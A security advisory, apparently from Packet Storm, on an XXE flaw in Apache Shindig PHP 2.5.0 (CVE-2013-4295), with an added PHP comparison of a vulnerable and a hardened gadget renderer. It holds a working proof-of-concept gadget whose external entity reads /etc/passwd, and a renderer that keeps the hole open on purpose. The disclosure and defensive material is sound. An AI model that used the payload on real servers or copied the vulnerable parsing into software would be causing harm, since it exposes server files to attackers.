Apache Shindig 2.5.0 XXE Injection

2013-10-22T00:00:00
ID PACKETSTORM:123724
Type packetstorm
Reporter Kousuke Ebihara
Modified 2013-10-22T00:00:00

Description

CVE-2013-4295: XXE vulnerability in Apache Shindig 2.5.0 (PHP)  
  
Severity: Important  
  
Vendor: The Apache Software Foundation  
  
Versions Affected: Apache Shindig PHP 2.5.0  
  
Description: The gadget renderer in the PHP version of Apache Shindig  
is subject to an XML External Entity (XXE) Injection attack. A  
malicious gadget author can declare an external entity whose SYSTEM  
identifier points at a file on the gadget rendering server; the  
renderer resolves the entity and displays the file's contents in the  
gadget iframe.  
  
Mitigation: 2.5.0 users should upgrade to 2.5.0-update1.  
  
Example: The following gadget XML demonstrates the issue.  
  
<?xml version="1.0" encoding="UTF-8"?>  
<!DOCTYPE Module [ <!ENTITY passwd SYSTEM "file:///etc/passwd"> ]>  
<Module>  
<ModulePrefs title="Test Application">  
<Require feature="opensocial-0.9" />  
</ModulePrefs>  
<Content type="html">  
&passwd; hello  
</Content>  
</Module>  
  
After rendering this gadget you will see the content of /etc/passwd in  
the gadget iframe.  
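The following is an added example, not code from Apache Shindig or from the advisory author. It models the rendering step in plain PHP: a naive DOMDocument-based extractor that substitutes entities (the behaviour the advisory describes) next to a hardened version that refuses any DOCTYPE and turns off libxml's external entity loader. The function names, the benign gadget and the hardening strategy are assumptions for illustration; they are not Shindig's actual patch.

```php
<?php
declare(strict_types=1);

// The advisory's proof-of-concept gadget, embedded here as constructed input.
const POC_GADGET = <<<'XML'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Module [ <!ENTITY passwd SYSTEM "file:///etc/passwd"> ]>
<Module>
<ModulePrefs title="Test Application">
<Require feature="opensocial-0.9" />
</ModulePrefs>
<Content type="html">
&passwd; hello
</Content>
</Module>
XML;

// A benign gadget (constructed for this example) with no DTD at all.
const BENIGN_GADGET = <<<'XML'
<?xml version="1.0" encoding="UTF-8"?>
<Module>
<ModulePrefs title="Hello"><Require feature="opensocial-0.9" /></ModulePrefs>
<Content type="html">hello</Content>
</Module>
XML;

// Vulnerable: expands entity references, including SYSTEM entities declared
// in the internal DTD subset, so file:///etc/passwd is read from the
// rendering server and spliced into the gadget body.
function renderContentVulnerable(string $spec): string
{
    libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    // LIBXML_NOENT asks libxml to substitute entities. Note that simply
    // dropping this flag is not a reliable fix: while the external entity
    // loader is enabled, libxml may still fetch the entity to check it is
    // well-formed, and textContent can expose it.
    $doc->loadXML($spec, LIBXML_NOENT | LIBXML_DTDLOAD);
    $content = $doc->getElementsByTagName('Content')->item(0);
    return $content === null ? '' : trim($content->textContent);
}

// Hardened: gadget specs have no legitimate need for a DTD, so reject any
// DOCTYPE outright and disable external entity resolution before parsing.
function renderContentHardened(string $spec): string
{
    // Cheap pre-parse gate. A "<!DOCTYPE" inside a comment or CDATA section
    // would also be rejected; for this input format that strictness is fine.
    if (preg_match('/<!DOCTYPE/i', $spec) === 1) {
        throw new InvalidArgumentException('DOCTYPE declarations are not allowed in gadget specs');
    }
    // Since PHP 8.0 libxml no longer loads external entities by default and
    // this call is deprecated; on older runtimes it is the essential switch.
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }
    libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    // No LIBXML_NOENT, no LIBXML_DTDLOAD, and LIBXML_NONET blocks network
    // fetches should a DTD slip through anyway.
    if ($doc->loadXML($spec, LIBXML_NONET) === false) {
        throw new InvalidArgumentException('gadget spec is not well-formed XML');
    }
    // Post-parse check that the document really carries no DTD.
    if ($doc->doctype !== null) {
        throw new InvalidArgumentException('gadget spec carries a DTD');
    }
    $content = $doc->getElementsByTagName('Content')->item(0);
    return $content === null ? '' : trim($content->textContent);
}

$renderers = [
    'vulnerable' => 'renderContentVulnerable',
    'hardened'   => 'renderContentHardened',
];
foreach (['poc' => POC_GADGET, 'benign' => BENIGN_GADGET] as $name => $spec) {
    foreach ($renderers as $label => $fn) {
        try {
            // Truncate so a successful /etc/passwd read shows only its first line.
            printf("%-7s %-10s -> %s\n", $name, $label, strtok($fn($spec), "\n"));
        } catch (InvalidArgumentException $e) {
            printf("%-7s %-10s -> rejected: %s\n", $name, $label, $e->getMessage());
        }
    }
}
```

Run on a pre-8.0 PHP with a readable /etc/passwd, the vulnerable renderer prints the first line of that file for the proof-of-concept gadget, while the hardened one rejects it and still renders the benign gadget's "hello". Rejecting the DOCTYPE rather than filtering entity types is deliberate: it also closes parameter-entity and external-DTD variants that an entity-name blacklist would miss.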
  
Credit: This issue was discovered by Kousuke Ebihara.  
  
References: http://shindig.apache.org/security.html  